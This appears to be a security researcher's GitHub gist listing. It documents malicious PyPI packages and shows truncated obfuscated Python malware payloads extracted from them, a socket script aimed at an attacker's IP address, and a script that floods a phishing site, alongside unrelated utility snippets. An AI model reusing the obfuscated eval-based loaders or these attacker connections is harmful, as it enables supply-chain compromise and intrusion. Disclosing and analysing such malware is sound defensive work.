Skip to content

Instantly share code, notes, and snippets.

View jossef's full-sized avatar
🌶️

Jossef Harush Kadouri jossef

🌶️
114 followers · 0 following
View GitHub Profile
@jossef
jossef / remote-shell.csv
Created January 22, 2023 16:08
python remote shell incident related packages
Published Package Name Package version owners Package type
Jan 15, 2023 @ 17:30:02.112 aidoc-transit 5.2.4 pypi/aidoc pypi
Jan 15, 2023 @ 16:27:04.363 aidoc-transit 5.2.3 pypi/aidoc pypi
Jan 11, 2023 @ 16:09:01.676 aidoc-transit 5.2.2 pypi/aidoc pypi
Jan 10, 2023 @ 20:51:09.394 aidoc-transit 5.2.1 pypi/aidoc pypi
Dec 29, 2022 @ 20:06:08.912 aidoc-e2e-utils 5.0.3 pypi/aidoc pypi
Dec 29, 2022 @ 20:00:05.994 aidoc.genmfa 3.0.3 pypi/aidoc pypi
Dec 29, 2022 @ 19:57:04.130 aidoc-consul 5.2.0 pypi/aidoc pypi
Dec 29, 2022 @ 04:45:04.156 aidoc.genmfa 3.0.2 pypi/aidoc pypi
Dec 29, 2022 @ 04:39:05.953 aidoc-e2e-utils 5.0.2 pypi/aidoc pypi
@jossef
jossef / script.py
Last active January 5, 2023 09:20
remote shell chat script with attacker
import socket
import subprocess
def main():
ip_address = '3.221.152.203'
port = 771
print(f'connecting to {ip_address}:{port}')
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (ip_address, port)
@jossef
jossef / packages.csv
Last active December 29, 2022 19:38
reverse shell pypi malware packages
Package Type Package Name Package Version User Account Date
pypi aidoc-e2e-utils 5.0.3 pypi/aidoc 2022-12-29
pypi aidoc-consul 5.0.3 pypi/aidoc 2022-12-29
pypi aidoc.genmfa 3.0.0 pypi/aidoc 2022-12-29
pypi aidoc-e2e-utils 5.0.0 pypi/aidoc 2022-12-29
pypi aidoc.genmfa 3.0.2 pypi/aidoc 2022-12-29
pypi aidoc-e2e-utils 5.0.2 pypi/aidoc 2022-12-29
pypi aidoc-consul 5.0.7 pypi/aidoc 2022-12-29
pypi aidoc-consul 5.0.8 pypi/aidoc 2022-12-29
pypi aidoc.genmfa 3.0.3 pypi/aidoc 2022-12-29
@jossef
jossef / wasp-packages.csv
Last active November 16, 2022 15:42
wasp malware packages
Package Name Package Version Created
apicolor 1.2.1 2022-10-31T21:32:43.000000
apicolor 1.2.3 2022-11-01T01:32:40.000000
apicolor 1.2.4 2022-11-01T18:48:38.000000
apicolor 6.6.6 2022-11-05T00:00:35.000000
apicolors 6.6.6 2022-11-06T02:00:29.000000
apicolors 6.6.7 2022-11-07T00:32:57.000000
ascii2art 4.1 2022-11-14T13:21:13.000000
blockcypher-lib 1.0.93 2022-11-14T13:54:09.000000
colorapi 0.0.1 2022-11-13T22:03:05.000000
@jossef
jossef / payload1.py
Last active December 28, 2023 07:45
Malware code - Reverse engineering session Python malware 2022-11-13
from builtins import *;wxxwxwwxxxxwwxwwwwww,jijiilliljiilljijjiijl,S222SS2S22S222SSSSS,SSS222S222222SS2SS2S,mmmmnmnnmnmnnnmmnmmnmmn=(lambda lIlIlIlllIIlIIllIllIIlll:lIlIlIlllIIlIIllIllIIlll(__import__('\x7a\x6c\x69\x62'))),(lambda lIlIlIlllIIlIIllIllIIlll:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(lIlIlIlllIIlIIllIllIIlll)"),filename='\x6a\x6c\x6c\x69\x69\x6c\x6a\x6a\x6c\x69\x6c\x6c\x6c\x6c\x6a\x6a\x69\x6c\x69\x6c\x69\x6a\x6c\x69\x6c',mode='\x65\x76\x61\x6c'))),(lambda lIlIlIlllIIlIIllIllIIlll:lIlIlIlllIIlIIllIllIIlll['\x64\x65\x63\x6f\x6d\x70\x72\x65\x73\x73']),(lambda wxxxwxwxxxwxxwwxwxwxxxxxw,lIlIlIlllIIlIIllIllIIlll:wxxxwxwxxxwxxwwxwxwxxxxxw(lIlIlIlllIIlIIllIllIIlll)),(lambda:(lambda lIlIlIlllIIlIIllIllIIlll:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x
@jossef
jossef / payload.py
Created November 13, 2022 19:49
malicious payload extracted from pypi package "colorsapi"
from builtins import *;XXXXXXXXWXWXWXXWXX,xxxxxxwxxwxxwwxxwwxwxxxx,mmmnnnnnmnnnnmnmnnnnnmn,XXXXXWWWWXXXXWXXXXWWWW,nmnmnnnmnnnmnnnnmnmmn=(lambda IllIlIlIIIIIlllllIIllll:IllIlIlIIIIIlllllIIllll['\x64\x65\x63\x6f\x6d\x70\x72\x65\x73\x73']),(lambda IllIlIlIIIIIlllllIIllll:IllIlIlIIIIIlllllIIllll(__import__('\x7a\x6c\x69\x62'))),(lambda IllIlIlIIIIIlllllIIllll:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(IllIlIlIIIIIlllllIIllll)"),filename='\x6a\x69\x6c\x69\x6a\x6a\x69\x69\x6a\x6a\x6c\x69\x6c\x6c\x6c\x6a\x6a',mode='\x65\x76\x61\x6c'))),(lambda:(lambda IllIlIlIIIIIlllllIIllll:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(IllIlIlIIIIIlllllIIllll)"),filename='\x6a\x69\x6c\x69\x6a\x6
@jossef
jossef / spam-phishing-attackers.py
Created May 28, 2022 17:38
import re
import random
from faker import Faker
import threading
import requests
def worker_thread():
domain = 'marhartap.bs53rssqj9-eqg35wogk3xn.p.runcloud.link'
user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36'
@jossef
jossef / pdf-to-pptx.py
Created November 2, 2021 11:41
pdf to pptx as raster images (figma export workaround)
from pptx import Presentation
import fitz
import os
import tempfile
pdf_file_path = r'path/to/pdf/file.pdf'
pptx_file_path = r'path/to/pptx/file.pptx'
presentation = Presentation()
blank_slide_layout = presentation.slide_layouts[6]
@jossef
jossef / sockets.py
Last active August 25, 2021 11:33
sockets timeout recv tests script
import select
import socket
def scenario_1__stuck():
sock = socket.create_connection(('neverssl.com', 80))
sock.send(b'GET / HTTP/1.1\r\nHost: neverssl.com\r\n\r\n')
data = sock.recv(4096)
print('1st recv', data)
data = sock.recv(4096) # <- gonna stuck here
@jossef
jossef / force-delete-k8s-namespace.py
Created August 13, 2020 12:50
force delete k8s namespace
#!/usr/bin/env python3
import atexit
import json
import requests
import subprocess
import sys
namespace = sys.argv[1]
proxy_process = subprocess.Popen(['kubectl', 'proxy'])
atexit.register(proxy_process.kill)